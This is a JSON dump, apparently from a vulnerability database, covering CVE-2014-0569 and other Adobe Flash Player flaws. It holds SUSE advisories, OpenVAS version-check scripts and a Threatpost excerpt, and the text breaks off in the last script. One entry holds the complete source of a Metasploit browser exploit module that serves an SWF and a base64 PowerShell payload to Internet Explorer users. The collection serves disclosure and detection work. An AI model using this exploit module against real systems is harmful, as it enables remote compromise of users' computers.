11 (fixed by update two), 10 (fixed by update 14), 9.0.2 (fixed by update 7), 9.0.1 (fixed by update 12) and 9.0 (fixed by update 13), are given level two severity ratings, meaning they resolve bugs in important products, but that there are currently no in-the-wild attacks.\n\nAdobe credits Craig Young of Tripwire VERT for CVE-2014-0570, Pete Freitag for CVE-2014-0571 and Aaron Foote for CVE-2014-0572.\n", "modified": "2014-10-16T14:47:10", "published": "2014-10-14T15:02:06", "id": "THREATPOST:2B0F6242C9EF7ABD2CC3142F2254E2A3", "href": "https://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838/", "type": "threatpost", "title": "Fixes for IE, Flash Player in October Patch Tuesday Release", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-04T15:33:49", "bulletinFamily": "exploit", "description": "This Metasploit module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This Metasploit module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.", "modified": "2015-04-12T00:00:00", "published": "2015-04-12T00:00:00", "id": "1337DAY-ID-23503", "href": "https://0day.today/exploit/description/23503", "type": "zdt", "title": "Adobe Flash Player casi32 Integer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player casi32 Integer Overflow',\r\n 'Description' => %q{\r\n This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\r\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\r\n domainMemory for the current application domain. This module has been tested successfully\r\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['ZDI', '14-365'],\r\n ['CVE', '2014-0569'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^15\\./ && ver == '15.0.0.167' },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23503"}], "suse": [{"lastseen": "2016-09-04T11:49:45", "bulletinFamily": "unix", "description": "This update fixes multiple code execution vulnerabilities in flash-player\n (APSB14-22). CVE-2014-0564, CVE-2014-0558 and CVE-2014-0569 have been\n assigned to this issue.\n\n Security Issues:\n\n * CVE-2014-0569\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569</a>>\n * CVE-2014-0564\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0564\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0564</a>>\n * CVE-2014-0558\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0558\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0558</a>>\n", "modified": "2014-11-05T19:04:50", "published": "2014-11-05T19:04:50", "id": "SUSE-SU-2014:1360-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00002.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "description": "Adobe Flash Player was updated to 11.2.202.411, fixing security issues and\n bugs.\n\n For more information please read:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\">http://helpx.adobe.com/security/products/flash-player/apsb14-22.html</a>\n\n", "modified": "2014-11-13T17:05:02", "published": "2014-11-13T17:05:02", "id": "SUSE-SU-2014:1423-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00014.html", "type": "suse", "title": "Security update for flash-player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "modified": "2015-04-16T13:04:48", "published": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851067", "title": "SuSE Update for flash-player SUSE-SU-2014:1423-1 (flash-player)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1423_1.nasl 14110 2019-03-12 09:28:23Z cfischer $\n#\n# SuSE Update for flash-player SUSE-SU-2014:1423-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851067\");\n script_version(\"$Revision: 14110 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 10:28:23 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:21:12 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for flash-player SUSE-SU-2014:1423-1 (flash-player)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.411, fixing security issues and\n bugs.\n\n For more information please see the referenced vendor advisory.\");\n\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1423_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.411~4.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.411~4.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310850863", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850863", "title": "SuSE Update for flash-player SUSE-SU-2014:1360-1 (flash-player)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1360_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for flash-player SUSE-SU-2014:1360-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850863\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:23:47 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for flash-player SUSE-SU-2014:1360-1 (flash-player)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update fixes multiple code execution vulnerabilities in flash-player\n (APSB14-22). CVE-2014-0564, CVE-2014-0558 and CVE-2014-0569 have been\n assigned to this issue.\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1360_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.411~0.3.1\", rls:\"SLED11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.411~0.3.1\", rls:\"SLED11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.411~0.3.1\", rls:\"SLED11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:22", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805002", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805002\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:31:59 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 13.0.0.250 and 14.x and 15.x before 15.0.0.189 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.250 or 15.0.0.189 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.250\") ||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"15.0.0.188\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:32", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805003", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805003\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:40:11 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 13.0.0.250 and 14.x and 15.x before 15.0.0.189 on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.250 or 15.0.0.189 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.250\") ||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"15.0.0.188\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:29", "bulletinFamily": "scanner", "description": "This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805006", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805006", "title": "Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805006\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:56:20 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version before 15.0.0.293 on\n Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"15.0.0.293\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:37", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805004", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805004", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805004\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", 